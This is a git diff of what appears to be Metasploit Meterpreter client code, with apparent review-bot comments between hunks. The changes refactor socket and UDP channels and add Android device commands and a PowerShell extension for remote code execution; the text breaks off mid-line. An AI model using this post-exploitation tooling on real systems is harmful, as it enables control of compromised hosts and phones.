b/lib/rex/parser/nokogiri_doc_mixin.rb index bfee26fa8c..9e59c56061 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb @@ -200,6 +200,11 @@ module Parser return attr_pairs end + # Removes HTML from a string + def strip_html_tags(text) + return text.gsub!(/(<[^>]*>)|\n|\t/s) {" "} + end + # This breaks xml-encoded characters, so need to append. # It's on the end_element tag name to turn the appending # off and clear out the data. diff --git a/lib/rex/parser/openvas_nokogiri.rb b/lib/rex/parser/openvas_nokogiri.rb index 07fd3c6b82..b38d034abe 100644 --- a/lib/rex/parser/openvas_nokogiri.rb 
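Review bot: `strip_html_tags` returns the result of `gsub!`, which is `nil` when nothing was replaced and which mutates the caller's string in place, so plain text without tags, newlines or tabs comes back as `nil`. `text.gsub(/<[^>]*>|\n|\t/, ' ')` returns a new string in every case. The trailing `/s` is an encoding flag (Windows-31J) in Ruby, not a dot-matches-newline flag, and should probably be dropped. A comment that this is a display-cleanup helper and not an HTML sanitizer would keep it from being relied on for untrusted markup.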
+++ b/lib/rex/parser/openvas_nokogiri.rb @@ -4,7 +4,7 @@ require "rex/parser/nokogiri_doc_mixin" module Rex module Parser - # If Nokogiri is available, define OpenVAS document class. + # If Nokogiri is available, define OpenVas document class. load_nokogiri && class OpenVASDocument < Nokogiri::XML::SAX::Document include NokogiriDocMixin @@ -37,8 +37,10 @@ module Parser @state[:vuln_name] = @text.strip if @text end when 'description' - @state[:has_text] = true - @state[:vuln_desc] = @text.strip if @text + if in_tag('result') + @state[:has_text] = true + @state[:vuln_desc] = @text.strip if @text + end when 'bid' if in_tag('result') && in_tag('nvt') @state[:has_text] = true @@ -62,7 +64,7 @@ module Parser when 'subnet' @state[:has_text] = true when 'result' - record_vuln if in_tag('results') + record_vuln when 'threat' @state[:has_text] = true if in_tag('ports') && in_tag('port') when 'host' diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb index d693e3bf74..50da0dc185 100644 --- a/lib/rex/post/meterpreter/channel.rb +++ b/lib/rex/post/meterpreter/channel.rb @@ -141,7 +141,9 @@ class Channel if (cid and client) client.add_channel(self) end - ObjectSpace.define_finalizer( self, self.class.finalize(self.client, self.cid) ) + + # Ensure the remote object is closed when all references are removed + ObjectSpace.define_finalizer(self, self.class.finalize(client, cid)) end def self.finalize(client,cid) @@ -288,8 +290,11 @@ class Channel end def _close(addends = nil) - self.class._close(self.client, self.cid, addends) - self.cid = nil + unless self.cid.nil? + ObjectSpace.undefine_finalizer(self) + self.class._close(self.client, self.cid, addends) + self.cid = nil + end end # # Enables or disables interactive mode. diff --git a/lib/rex/post/meterpreter/channels/datagram.rb b/lib/rex/post/meterpreter/channels/datagram.rb new file mode 100644 index 0000000000..fc8c2e3323 --- /dev/null +++ b/lib/rex/post/meterpreter/channels/datagram.rb 
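Review bot: In `_close` the finalizer is removed before `self.class._close` runs, so if that call raises, `cid` stays set but nothing is left to close the remote channel when the object is collected. Removing the finalizer only after the close succeeds keeps the fallback: move `ObjectSpace.undefine_finalizer(self)` to the line after `self.class._close(self.client, self.cid, addends)`. Whether the class-level `_close` can raise depends on code outside this hunk.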
@@ -0,0 +1,75 @@ +# -*- coding: binary -*- + +require 'rex/io/datagram_abstraction' +require 'rex/post/meterpreter/channels/socket_abstraction' + +module Rex +module Post +module Meterpreter + +### +# +# Stream +# ------ +# +# This class represents a channel that is streaming. This means +# that sequential data is flowing in either one or both directions. +# +### +class Datagram < Rex::Post::Meterpreter::Channel + + include Rex::Post::Meterpreter::SocketAbstraction + include Rex::IO::DatagramAbstraction + + class << self + def cls + return CHANNEL_CLASS_DATAGRAM + end + end + + module SocketInterface + include Rex::Post::Meterpreter::SocketAbstraction::SocketInterface + def type? + 'udp' + end + + def recvfrom_nonblock(length,flags = nil) + return [super(length, flags)[0], super(length, flags)[0]] + end + + def send(buf, flags, saddr) + channel.send(buf, flags, saddr) + end + end + + def dio_write_handler(packet, data) + @recvd ||= [] + @recvd << [packet, data] + peerhost = packet.get_tlv_value( + Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PEER_HOST + ) + peerport = packet.get_tlv_value( + Rex::Post::Meterpreter::Extensions::Stdapi::TLV_TYPE_PEER_PORT + ) + + if peerhost && peerport + # Maxlen here is 65507, to ensure we dont overflow, we need to write twice + # If the other side has a full 64k, handle by splitting up the datagram and + # writing multiple times along with the sockaddr. Consumers calling recvfrom + # repeatedly will buffer up all the pieces. + while data.length > 65507 + rsock.syswrite(data[0..65506]) + rsock.syswrite(Rex::Socket.to_sockaddr(peerhost,peerport)) + data = data - data[0..65506] + end + rsock.syswrite(data) + rsock.syswrite(Rex::Socket.to_sockaddr(peerhost,peerport)) + return true + else + return false + end + end + +end + +end; end; end diff --git a/lib/rex/post/meterpreter/channels/socket_abstraction.rb b/lib/rex/post/meterpreter/channels/socket_abstraction.rb new file mode 100644 index 0000000000..c59577dfae --- /dev/null 
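Review bot: The split loop in `dio_write_handler` does `data = data - data[0..65506]`, and String has no `-` operator, so any payload longer than 65507 bytes raises NoMethodError instead of being split; `data = data[65507..-1]` advances the buffer. Every call also appends `[packet, data]` to `@recvd`, which nothing in this file reads or trims, so the array grows for the life of the channel. `recvfrom_nonblock` calls `super` twice and takes element 0 of each, which relies on the payload and the sockaddr arriving as two consecutive reads; a comment stating that pairing, and what happens when the second read is not yet available, would help. The class header comment still describes a Stream.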
+++ b/lib/rex/post/meterpreter/channels/socket_abstraction.rb 
@@ -0,0 +1,160 @@ +# -*- coding: binary -*- + +# require 'rex/io/socket_abstraction' +require 'rex/post/meterpreter/channel' + +module Rex +module Post +module Meterpreter + +### +# +# Abstraction +# ------ +# +# This class represents a channel that is streaming. This means +# that sequential data is flowing in either one or both directions. +# +### +module SocketAbstraction + + class << self + def cls + raise NotImplementedError + end + end + + module SocketInterface + def type? + raise NotImplementedError + end + + def getsockname + return super if not channel + # Find the first host in our chain (our address) + hops = 0 + csock = channel.client.sock + while(csock.respond_to?('channel')) + csock = csock.channel.client.sock + hops += 1 + end + _address_family,caddr,_cport = csock.getsockname + address_family,raddr,_rport = csock.getpeername + _maddr,mport = [ channel.params.localhost, channel.params.localport ] + [ address_family, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ] + end + + def getpeername + return super if not channel + address_family,_caddr,_cport = channel.client.sock.getpeername + maddr,mport = [ channel.params.peerhost, channel.params.peerport ] + [ address_family, "#{maddr}", "#{mport}" ] + end + + %i{localhost localport peerhost peerport}.map do |meth| + define_method(meth) { + return super if not channel + channel.params.send(meth) + } + end + + def close + super + channel.cleanup_abstraction + channel.close + end + + attr_accessor :channel + end + + # + # Simple mixin for lsock in order to help avoid a ruby interpreter issue with ::Socket.pair + # Instead of writing to the lsock, reading from the rsock and then writing to the channel, + # we use this mixin to directly write to the channel. + # + # Note: This does not work with OpenSSL as OpenSSL is implemented natively and requires a real + # socket to write to and we cant intercept the sockets syswrite at a native level. 
+ # + # Note: The deadlock only seems to effect the Ruby build for cygwin. + # + module DirectChannelWrite + + def syswrite(buf) + channel._write(buf) + end + + attr_accessor :channel + end + + ## + # + # Constructor + # + ## + + # + # Passes the initialization information up to the base class + # + def initialize(client, cid, type, flags) + # sf: initialize_abstraction() before super() as we can get a scenario where dio_write_handler() is called + # with data to write to the rsock but rsock has not yet been initialized. This happens if the channel + # is registered (client.add_channel(self) in Channel.initialize) to a session and a 'core_channel_write' + # request comes in before we have called self.initialize_abstraction() + initialize_abstraction + super(client, cid, type, flags) + end + + ## + # + # Remote I/O handlers + # + ## + + # + # Performs a write operation on the right side of the local stream. + # + def dio_write_handler(packet, data) + rv = Rex::ThreadSafe.select(nil, [rsock], nil, 0.01) + if(rv) + rsock.syswrite(data) + return true + else + return false + end + end + + # + # Performs a close operation on the right side of the local stream. + # + def dio_close_handler(packet) + rsock.close + + return super(packet) + end + + # + # Cleans up the stream abstraction. + # + def cleanup + super + + cleanup_abstraction + end + + # + # Wrap the _write() call in order to catch some common, but harmless Windows exceptions + # + def _write(*args) + begin + super(*args) + rescue ::Rex::Post::Meterpreter::RequestError => e + case e.code + when 10000 .. 10100 + raise ::Rex::ConnectionError.new + end + end + end + +end + +end; end; end diff --git a/lib/rex/post/meterpreter/channels/stream.rb b/lib/rex/post/meterpreter/channels/stream.rb index 95c1e48e6e..09e1f86b3c 100644 --- a/lib/rex/post/meterpreter/channels/stream.rb +++ b/lib/rex/post/meterpreter/channels/stream.rb 
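Review bot: The accessors generated by `%i{localhost localport peerhost peerport}.map` call bare `super` inside a `define_method` block, which Ruby rejects at call time with a RuntimeError (implicit argument passing of super is not supported there), so the path taken when `channel` is unset fails instead of falling through. `return super() unless channel`, with `each` in place of `map`, fixes it. Separately, `_write` rescues `RequestError` and re-raises only for codes 10000..10100; any other code is swallowed and the method returns nil, so an `else raise` in the `case` would keep unexpected failures visible. `SocketInterface#close` dereferences `channel` without the nil guard the other methods use.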
@@ -1,7 +1,7 @@ # -*- coding: binary -*- require 'rex/io/stream_abstraction' -require 'rex/post/meterpreter/channel' +require 'rex/post/meterpreter/channels/socket_abstraction' module Rex module Post @@ -18,6 +18,7 @@ module Meterpreter ### class Stream < Rex::Post::Meterpreter::Channel + include Rex::Post::Meterpreter::SocketAbstraction include Rex::IO::StreamAbstraction class << self @@ -26,61 +27,13 @@ class Stream < Rex::Post::Meterpreter::Channel end end - ## - # - # Constructor - # - ## - - # - # Passes the initialization information up to the base class - # - def initialize(client, cid, type, flags) - # sf: initialize_abstraction() before super() as we can get a scenario where dio_write_handler() is called - # with data to write to the rsock but rsock has not yet been initialized. This happens if the channel - # is registered (client.add_channel(self) in Channel.initialize) to a session and a 'core_channel_write' - # request comes in before we have called self.initialize_abstraction() - initialize_abstraction - super(client, cid, type, flags) - end - - ## - # - # Remote I/O handlers - # - ## - - # - # Performs a write operation on the right side of the local stream. - # - def dio_write_handler(packet, data) - rv = Rex::ThreadSafe.select(nil, [rsock], nil, 0.01) - if(rv) - rsock.write(data) - return true - else - return false + module SocketInterface + include Rex::Post::Meterpreter::SocketAbstraction::SocketInterface + def type? + 'tcp' end end - # - # Performs a close operation on the right side of the local stream. - # - def dio_close_handler(packet) - rsock.close - - return super(packet) - end - - # - # Cleans up the stream abstraction. - # - def cleanup - super - - cleanup_abstraction - end - end end; end; end diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index b751768348..c550eaef79 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb 
@@ -469,7 +469,7 @@ class ClientCore < Extension end if client.platform =~ /linux/ - if writable_dir.blank? + if writable_dir.to_s.strip.empty? writable_dir = tmp_folder end @@ -752,7 +752,7 @@ class ClientCore < Extension def tmp_folder tmp = client.sys.config.getenv('TMPDIR') - if tmp.blank? + if tmp.to_s.strip.empty? tmp = '/tmp' end diff --git a/lib/rex/post/meterpreter/extensions/android/android.rb b/lib/rex/post/meterpreter/extensions/android/android.rb index 931b591708..fa4d1e8372 100644 --- a/lib/rex/post/meterpreter/extensions/android/android.rb +++ b/lib/rex/post/meterpreter/extensions/android/android.rb @@ -72,6 +72,12 @@ class Android < Extension response.get_tlv(TLV_TYPE_SHUTDOWN_OK).value end + def set_audio_mode(n) + request = Packet.create_request('set_audio_mode') + request.add_tlv(TLV_TYPE_AUDIO_MODE, n) + response = client.send_request(request) + end + def interval_collect(opts) request = Packet.create_request('interval_collect') request.add_tlv(TLV_TYPE_COLLECT_ACTION, COLLECT_ACTIONS[opts[:action]]) @@ -242,6 +248,23 @@ class Android < Extension response.get_tlv(TLV_TYPE_CHECK_ROOT_BOOL).value end + def activity_start(uri) + request = Packet.create_request('activity_start') + request.add_tlv(TLV_TYPE_URI_STRING, uri) + response = client.send_request(request) + if response.get_tlv(TLV_TYPE_ACTIVITY_START_RESULT).value + return nil + else + return response.get_tlv(TLV_TYPE_ACTIVITY_START_ERROR).value + end + end + + def set_wallpaper(data) + request = Packet.create_request('set_wallpaper') + request.add_tlv(TLV_TYPE_WALLPAPER_DATA, data) + response = client.send_request(request) + end + def send_sms(dest, body, dr) request = Packet.create_request('send_sms') request.add_tlv(TLV_TYPE_SMS_ADDRESS, dest) 
@@ -272,6 +295,33 @@ class Android < Extension end networks end + + def sqlite_query(dbname, query, writeable) + request = Packet.create_request('sqlite_query') + request.add_tlv(TLV_TYPE_SQLITE_NAME, dbname) + request.add_tlv(TLV_TYPE_SQLITE_QUERY, query) + request.add_tlv(TLV_TYPE_SQLITE_WRITE, writeable) + response = client.send_request(request, 30) + error_msg = response.get_tlv(TLV_TYPE_SQLITE_ERROR) + raise "SQLiteException: #{error_msg.value}" if error_msg + + unless writeable + result = { + columns: [], + rows: [] + } + data = response.get_tlv(TLV_TYPE_SQLITE_RESULT_GROUP) + unless data.nil? + columns = data.get_tlv(TLV_TYPE_SQLITE_RESULT_COLS) + result[:columns] = columns.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + data.each(TLV_TYPE_SQLITE_RESULT_ROW) do |row| + result[:rows] << row.get_tlv_values(TLV_TYPE_SQLITE_VALUE) + end + end + result + end + end + end end end diff --git a/lib/rex/post/meterpreter/extensions/android/tlv.rb b/lib/rex/post/meterpreter/extensions/android/tlv.rb index 99f269327d..15d047810b 100644 --- a/lib/rex/post/meterpreter/extensions/android/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/android/tlv.rb 
@@ -75,9 +75,22 @@ TLV_TYPE_CELL_BASE_LAT = TLV_META_TYPE_UINT | (TLV_EXTENSIONS TLV_TYPE_CELL_BASE_LONG = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9072) TLV_TYPE_CELL_NET_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9073) TLV_TYPE_CELL_SYSTEM_ID = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9074) +TLV_TYPE_AUDIO_MODE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 9075) +TLV_TYPE_URI_STRING = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9101) +TLV_TYPE_ACTIVITY_START_RESULT = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9102) +TLV_TYPE_ACTIVITY_START_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9103) +TLV_TYPE_SQLITE_RESULT_GROUP = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9080) +TLV_TYPE_SQLITE_NAME = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9081) +TLV_TYPE_SQLITE_QUERY = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9082) +TLV_TYPE_SQLITE_RESULT_COLS = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9083) +TLV_TYPE_SQLITE_RESULT_ROW = TLV_META_TYPE_GROUP | (TLV_EXTENSIONS + 9084) +TLV_TYPE_SQLITE_VALUE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9085) +TLV_TYPE_SQLITE_ERROR = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9086) +TLV_TYPE_SQLITE_WRITE = TLV_META_TYPE_BOOL | (TLV_EXTENSIONS + 9087) +TLV_TYPE_WALLPAPER_DATA = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 9201) end end diff --git a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb index fde12f624e..a69cfdfb07 100644 --- a/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb +++ b/lib/rex/post/meterpreter/extensions/extapi/wmi/wmi.rb @@ -31,7 +31,7 @@ class Wmi def query(query, root = nil) request = Packet.create_request('extapi_wmi_query') - request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.blank? + request.add_tlv(TLV_TYPE_EXT_WMI_DOMAIN, root) unless root.to_s.strip.empty? request.add_tlv(TLV_TYPE_EXT_WMI_QUERY, query) response = client.send_request(request) 
diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
new file mode 100644
index 0000000000..d4949d465c
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb
@@ -0,0 +1,83 @@ +# -*- coding: binary -*- + +require 'rex/post/meterpreter/extensions/powershell/tlv' + +module Rex +module Post +module Meterpreter +module Extensions +module Powershell + +### +# +# This meterpreter extensions a privilege escalation interface that is capable +# of doing things like dumping password hashes and performing local +# exploitation. +# +### +class Powershell < Extension + + + def initialize(client) + super(client, 'powershell') + + client.register_extension_aliases( + [ + { + 'name' => 'powershell', + 'ext' => self + }, + ]) + end + + + def import_file(opts={}) + return nil unless opts[:file] + + # if it's a script, then we'll just use execute_string + if opts[:file].end_with?('.ps1') + opts[:code] = ::File.read(opts[:file]) + return execute_string(opts) + end + + # if it's a dll (hopefully a .NET 2.0 one) then do something different + if opts[:file].end_with?('.dll') + # TODO: perhaps do some kind of check to see if the DLL is a .NET assembly? + binary = ::File.read(opts[:file]) + + request = Packet.create_request('powershell_assembly_load') + request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE, binary.length) + request.add_tlv(TLV_TYPE_POWERSHELL_ASSEMBLY, binary) + client.send_request(request) + return true + end + + return false + end + + def execute_string(opts={}) + return nil unless opts[:code] + + request = Packet.create_request('powershell_execute') + request.add_tlv(TLV_TYPE_POWERSHELL_CODE, opts[:code]) + request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id] + + response = client.send_request(request) + return response.get_tlv_value(TLV_TYPE_POWERSHELL_RESULT) + end + + def shell(opts={}) + request = Packet.create_request('powershell_shell') + request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id] + + response = client.send_request(request) + channel_id = response.get_tlv_value(TLV_TYPE_CHANNEL_ID) + if channel_id.nil? 
+ raise Exception, "We did not get a channel back!" + end + Rex::Post::Meterpreter::Channels::Pools::StreamPool.new(client, channel_id, 'powershell_psh', CHANNEL_FLAG_SYNCHRONOUS) + end + +end + +end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/powershell/tlv.rb b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb new file mode 100644 index 0000000000..edb69d3c68 --- /dev/null +++ b/lib/rex/post/meterpreter/extensions/powershell/tlv.rb @@ -0,0 +1,18 @@ +# -*- coding: binary -*- +module Rex +module Post +module Meterpreter +module Extensions +module Powershell + +TLV_TYPE_POWERSHELL_SESSIONID = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 1) +TLV_TYPE_POWERSHELL_CODE = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2) +TLV_TYPE_POWERSHELL_RESULT = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3) +TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE = TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 4) +TLV_TYPE_POWERSHELL_ASSEMBLY = TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 5) + +end +end +end +end +end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb index 950815dbaa..753dd8c808 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb @@ -41,7 +41,7 @@ class Socket # register the inbound handler for the tcp server channel (allowing us to # receive new client connections to a tcp server channel) - client.register_inbound_handler( Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel ) + client.register_inbound_handler(Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel) end 
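Review bot: In `import_file`, the `.dll` branch reads the file with `::File.read` and sends `binary.length` as `TLV_TYPE_POWERSHELL_ASSEMBLY_SIZE`. `length` counts characters in the string's encoding, so unless the default external encoding is binary the declared size can differ from the number of bytes sent; `binary = ::File.binread(opts[:file])` with `binary.bytesize` avoids that. The response to `powershell_assembly_load` is also discarded, and the method returns `true` whatever the remote side reported. In `shell`, `raise Exception, ...` is not caught by a plain `rescue => e`; `raise RuntimeError, 'We did not get a channel back!'` (or a Rex error class) is the safer choice. The class header comment looks copied from another extension, since it describes privilege escalation and hash dumping rather than a PowerShell interface, and should be rewritten to match this class.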
@@ -49,7 +49,7 @@ class Socket # Deregister the inbound handler for the tcp server channel # def shutdown - client.deregister_inbound_handler( Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel ) + client.deregister_inbound_handler(Rex::Post::Meterpreter::Extensions::Stdapi::Net::SocketSubsystem::TcpServerChannel) end ## @@ -63,17 +63,17 @@ class Socket # in the socket parameters instance. The +params+ argument is expected to be # of type Rex::Socket::Parameters. # - def create( params ) + def create(params) res = nil - if( params.tcp? ) - if( params.server? ) - res = create_tcp_server_channel( params ) + if params.tcp? + if params.server? + res = create_tcp_server_channel(params) else - res = create_tcp_client_channel( params ) + res = create_tcp_client_channel(params) end - elsif( params.udp? ) - res = create_udp_channel( params ) + elsif params.udp? + res = create_udp_channel(params) end return res @@ -87,6 +87,8 @@ class Socket return SocketSubsystem::TcpServerChannel.open(client, params) rescue ::Rex::Post::Meterpreter::RequestError => e case e.code + when 10048 + raise ::Rex::AddressInUse.new(params.localhost, params.localport) when 10000 .. 10100 raise ::Rex::ConnectionError.new end @@ -100,7 +102,7 @@ class Socket def create_tcp_client_channel(params) begin channel = SocketSubsystem::TcpClientChannel.open(client, params) - if( channel != nil ) + if channel != nil return channel.lsock end return nil @@ -118,10 +120,16 @@ class Socket # def create_udp_channel(params) begin - return SocketSubsystem::UdpChannel.open(client, params) + channel = SocketSubsystem::UdpChannel.open(client, params) + if channel != nil + return channel.lsock + end + return nil rescue ::Rex::Post::Meterpreter::RequestError => e case e.code - when 10000 .. 10100 + when 10048 + raise ::Rex::AddressInUse.new(params.localhost, params.localport) + when 10000 .. 10100 raise ::Rex::ConnectionError.new end raise e 
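Review bot: The new `when 10048` arm in `create_tcp_server_channel` (and again in the `create_udp_channel` hunk) relies on an unexplained magic number and on being listed before `when 10000 .. 10100`, which would otherwise swallow it. A short comment such as `# 10048 is WSAEADDRINUSE; must stay above the 10000..10100 catch-all` would keep a later reordering from silently turning the address-in-use error back into a generic `ConnectionError`. Separately, `create_udp_channel` now returns `channel.lsock` instead of the channel object, so its header comment should state the new return value for callers that still expect a channel. The bodies of both methods continue outside the hunks shown.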
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb index d0127ef158..09832b6c2b 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb @@ -23,61 +23,6 @@ module SocketSubsystem ### class TcpClientChannel < Rex::Post::Meterpreter::Stream - class << self - def cls - return CHANNEL_CLASS_STREAM - end - end - - module SocketInterface - def type? - 'tcp' - end - - def getsockname - return super if not channel - # Find the first host in our chain (our address) - hops = 0 - csock = channel.client.sock - while(csock.respond_to?('channel')) - csock = csock.channel.client.sock - hops += 1 - end - tmp,caddr,cport = csock.getsockname - tmp,raddr,rport = csock.getpeername - maddr,mport = [ channel.params.localhost, channel.params.localport ] - [ tmp, "#{caddr}#{(hops > 0) ? "-_#{hops}_" : ""}-#{raddr}", "#{mport}" ] - end - - def getpeername - return super if not channel - tmp,caddr,cport = channel.client.sock.getpeername - maddr,mport = [ channel.params.peerhost, channel.params.peerport ] - [ tmp, "#{maddr}", "#{mport}" ] - end - - attr_accessor :channel - end - - # - # Simple mixin for lsock in order to help avoid a ruby interpreter issue with ::Socket.pair - # Instead of writing to the lsock, reading from the rsock and then writing to the channel, - # we use this mixin to directly write to the channel. - # - # Note: This does not work with OpenSSL as OpenSSL is implemented natively and requires a real - # socket to write to and we cant intercept the sockets syswrite at a native level. - # - # Note: The deadlock only seems to effect the Ruby build for cygwin. - # - module DirectChannelWrite - - def syswrite( buf ) - channel._write( buf ) - end - - attr_accessor :channel - end - ## # # Factory 
@@ -124,14 +69,14 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream # # Passes the channel initialization information up to the base class. # - def initialize( client, cid, type, flags ) - super( client, cid, type, flags ) + def initialize(client, cid, type, flags) + super(client, cid, type, flags) - lsock.extend( SocketInterface ) - lsock.extend( DirectChannelWrite ) + lsock.extend(SocketInterface) + lsock.extend(DirectChannelWrite) lsock.channel = self - rsock.extend( SocketInterface ) + rsock.extend(SocketInterface) rsock.channel = self end @@ -156,24 +101,11 @@ class TcpClientChannel < Rex::Post::Meterpreter::Stream request.add_tlv(TLV_TYPE_SHUTDOWN_HOW, how) request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid) - response = client.send_request(request) + client.send_request(request) return true end - # - # Wrap the _write() call in order to catch some common, but harmless Windows exceptions - # - def _write(*args) - begin - super(*args) - rescue ::Rex::Post::Meterpreter::RequestError => e - case e.code - when 10000 .. 10100 - raise ::Rex::ConnectionError.new - end - end - end end end; end; end; end; end; end; end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb index f8e7f310e0..62c03b58aa 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb @@ -5,6 +5,7 @@ require 'rex/socket/udp' require 'rex/socket/parameters' require 'rex/post/meterpreter/extensions/stdapi/tlv' require 'rex/post/meterpreter/channel' +require 'rex/post/meterpreter/channels/datagram' module Rex module Post 
@@ -14,30 +15,26 @@ module Stdapi module Net module SocketSubsystem -class UdpChannel < Rex::Post::Meterpreter::Channel - - # - # We inclue Rex::Socket::Udp as this channel is effectivly a UDP socket. - # - include Rex::Socket::Udp +class UdpChannel < Rex::Post::Meterpreter::Datagram # # We are a datagram channel. # - class << self - def cls - return CHANNEL_CLASS_DATAGRAM - end + def self.cls + CHANNEL_CLASS_DATAGRAM end # - # Open a new UDP channel on the remote end. The local host/port are optional, if none are specified - # the remote end will bind to INADDR_ANY with a random port number. The peer host/port are also - # optional, if specified all default send(), write() call will sendto the specified peer. If no peer - # host/port is specified you must use sendto() and specify the remote peer you wish to send to. This - # effectivly lets us create bound/unbound and connected/unconnected UDP sockets with ease. + # Open a new UDP channel on the remote end. The local host/port are + # optional, if none are specified the remote end will bind to INADDR_ANY + # with a random port number. The peer host/port are also optional, if + # specified all default send(), write() call will sendto the specified peer. + # If no peer host/port is specified you must use sendto() and specify the + # remote peer you wish to send to. This effectivly lets us create + # bound/unbound and connected/unconnected UDP sockets with ease. # - def UdpChannel.open(client, params) + # @return [Channel] + def self.open(client, params) c = Channel.create(client, 'stdapi_net_udp_client', self, CHANNEL_FLAG_SYNCHRONOUS, [ { 
@@ -66,95 +63,25 @@ class UdpChannel < Rex::Post::Meterpreter::Channel # def initialize(client, cid, type, flags) super(client, cid, type, flags) - # the instance variable that holds all incoming datagrams. - @datagrams = [] - end - # - # We overwrite Rex::Socket::Udp.timed_read in order to avoid the call to Kernel.select - # which wont be of use as we are not a natively backed ::Socket or ::IO instance. - # - def timed_read( length=65535, timeout=def_read_timeout ) - result = '' + lsock.extend(Rex::Socket::Udp) + lsock.initsock + lsock.extend(SocketInterface) + lsock.extend(DirectChannelWrite) + lsock.channel = self - begin - Timeout.timeout( timeout ) { - while( true ) - if( @datagrams.empty? ) - Rex::ThreadSafe.sleep( 0.2 ) - next - end - result = self.read( length ) - break - end - } - rescue Timeout::Error - result = '' - end + # rsock.extend( Rex::Socket::Udp ) + rsock.extend(SocketInterface) + rsock.channel = self - return result - end - - # - # We overwrite Rex::Socket::Udp.recvfrom in order to correctly hand out the - # datagrams which the remote end of this channel has received and are in the - # queue. - # - def recvfrom( length=65535, timeout=def_read_timeout ) - result = nil - # force a timeout on the wait for an incoming datagram - begin - Timeout.timeout( timeout ) { - while( true ) - # wait untill we have at least one datagram in the queue - if( @datagrams.empty? ) - Rex::ThreadSafe.sleep( 0.2 ) - next - end - # grab the oldest datagram we have received... - result = @datagrams.shift - # break as we have a result... - break - end - } - rescue Timeout::Error - result = nil - end - # if no result return nothing - if( result == nil ) - return [ '', nil, nil ] - end - # get the data from this datagram - data = result[0] - # if its only a partial read of this datagram, slice it, loosing the remainder. 
- result[0] = data[0,length-1] if data.length > length - # return the result in the form [ data, host, port ] - return result - end - - # - # Overwrite the low level sysread to read data off our datagram queue. Calls - # to read() will end up calling this. - # - def sysread( length ) - result = self.recvfrom( length ) - return result[0] - end - - # - # Overwrite the low level syswrite to write data to the remote end of the channel. - # Calls to write() will end up calling this. - # - def syswrite( buf ) - return _write( buf ) end # # This function is called by Rex::Socket::Udp.sendto and writes data to a specified # remote peer host/port via the remote end of the channel. # - def send( buf, flags, saddr ) - af, peerhost, peerport = Rex::Socket.from_sockaddr( saddr ) + def send(buf, flags, saddr) + _af, peerhost, peerport = Rex::Socket.from_sockaddr(saddr) addends = [ { @@ -167,42 +94,9 @@ class UdpChannel < Rex::Post::Meterpreter::Channel } ] - return _write( buf, buf.length, addends ) + return _write(buf, buf.length, addends) end - # - # The channels direct io write handler for any incoming data from the remote end - # of the channel. We extract the data and peer host/port, and save this to a queue - # of incoming datagrams which are passed out via calls to self.recvfrom() - # - def dio_write_handler( packet, data ) - - peerhost = 